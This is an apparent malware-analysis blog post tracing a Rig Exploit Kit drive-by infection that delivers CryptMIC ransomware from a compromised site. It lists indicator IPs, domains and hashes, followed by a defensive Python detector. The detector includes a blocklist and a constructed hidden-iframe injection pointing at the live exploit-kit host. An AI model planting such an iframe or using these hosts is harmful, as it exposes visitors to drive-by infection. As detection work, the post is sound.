- 22.214.171.124 – zurnyachts[.]com – Compromised Site
- 126.96.36.199 – butterteigenpassionisten.loganslittleangels.org – Rig EK
- 188.8.131.52 – CryptMIC post-infection traffic via TCP port 443
Video of Infection:
Sorry in advance if you don’t like my music selection! I will take song requests for $10! 😉
- SHA256: 00895735b2297cd73b723f27120bd86c56957e069156050a8eabf3e8a3811fa4 – File name: RigEK Landing Page.html
- SHA256: dbb2d959adc4986c43b6e9279d90ceb55a3b1686a0ac229575dc0f8dcac2e26f – File name: RigEK Flash Exploit.swf
- SHA256: e1c7071c4449b043d2d57f6501f463481f79b49e2cc4f75b4df5acf862b03f4d – File name: radA5147.tmp.exe
The infection starts out with the user (that would be me) browsing to a compromised website. In this case that website was zurnyachts[.]com (DO NOT GO TO THAT SITE). Within the site is a script from a campaign known as “pseudoDarkleech”. The script is very easy to spot when you know what you’re looking for. In this example it was at the very top of the source code, above the <html> tags. Here is a picture of the script on the site:
Once the browser loads the compromised website the URL within the pseudoDarkleech iframe causes a GET request to the Rig Exploit Kit landing page. At this point you’re off to the races. Here is the GET request for said landing page:
The landing page is obfuscated and encoded. It is at this point that the system receives instructions to download a Flash exploit. Below is the GET request for the Flash exploit:
If successful the payload will follow. In this instance we see it dropping an executable into %TEMP%:
In the video you can see the executable being preceded by a .js file. You can also see me trying to quickly copy it for fun, but I failed to do so before it deleted itself.
I also want to mention that even though the payload was delivered to the host there seems to have been an error. Somewhere along the way it failed to encrypt my files. In any case, you can see the ransom notes being dropped in %TEMP% and on the Desktop.
My recommendation would be to block the compromised website (for maybe a month or until it gets cleaned) and Rig EK IP on enterprise networks.
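As an added example (not code from the original post), here is a small Python triage script that applies the two observations above in a defensive way: it looks for iframes injected before the `<html>` tag, which is where the pseudoDarkleech script sat in this capture, and compares their destination hosts against a blocklist built from the IoCs listed at the top of the post. The sample page embedded in the script is constructed for illustration and is not the real injected script; the hosts and IPs in the blocklist are the ones given in the post.

```python
import re
from urllib.parse import urlparse

# Blocklist built from the IoCs listed in the post (defanged "[.]" refanged
# for matching). Nothing here is invented; extend it with your own feed.
BLOCKLIST = {
    "zurnyachts.com",                                   # compromised site
    "butterteigenpassionisten.loganslittleangels.org",  # Rig EK landing/exploit host
    "22.214.171.124",                                   # compromised site IP
    "126.96.36.199",                                    # Rig EK IP
    "188.8.131.52",                                     # CryptMIC post-infection IP
}

IFRAME_SRC = re.compile(r'<iframe[^>]+src\s*=\s*["\']?([^"\'\s>]+)', re.I)
HTML_OPEN = re.compile(r'<html[\s>]', re.I)


def refang(indicator):
    """Turn a defanged indicator such as zurnyachts[.]com back into a real host."""
    return indicator.replace("[.]", ".")


def preamble(source):
    """Return everything before the first <html> tag (the whole document if none).
    Legitimate pages put at most a doctype or comments here; pseudoDarkleech
    put its iframe here in this capture."""
    m = HTML_OPEN.search(source)
    return source if m is None else source[:m.start()]


def find_injected_iframes(source):
    """Return the src URLs of iframes that appear before the <html> tag."""
    return IFRAME_SRC.findall(preamble(source))


def is_blocked(url, blocklist=BLOCKLIST):
    """True if the URL's host (or bare host/IP) is on the blocklist."""
    url = refang(url)
    if "://" not in url:
        url = "http://" + url
    host = urlparse(url).hostname
    return host is not None and host.lower() in blocklist


def triage(source, blocklist=BLOCKLIST):
    """Return [(iframe_src, on_blocklist)] for every iframe injected before <html>."""
    return [(src, is_blocked(src, blocklist)) for src in find_injected_iframes(source)]


# Constructed sample: a hidden iframe placed above the <html> tag, pointing at the
# Rig EK host from the post. The query string is made up for the example.
SAMPLE_PAGE = (
    '<iframe src="http://butterteigenpassionisten.loganslittleangels.org/?q=example" '
    'width="1" height="1" style="display:none"></iframe>\n'
    '<!DOCTYPE html>\n<html><head><title>Yachts</title></head><body>hello</body></html>'
)

# Constructed clean page for comparison: same markup, no iframe before <html>.
CLEAN_PAGE = '<!DOCTYPE html>\n<html><head><title>Yachts</title></head><body>hello</body></html>'

if __name__ == "__main__":
    for page_name, page in (("sample", SAMPLE_PAGE), ("clean", CLEAN_PAGE)):
        hits = triage(page)
        if not hits:
            print(f"{page_name}: no iframe before <html>")
        for src, blocked in hits:
            print(f"{page_name}: iframe before <html> -> {src} (blocked={blocked})")
```

Running the script over a saved copy of a suspect page is enough to flag the injection pattern seen here; the blocklist check is what turns a "something odd above `<html>`" signal into a concrete match against the post's IoCs.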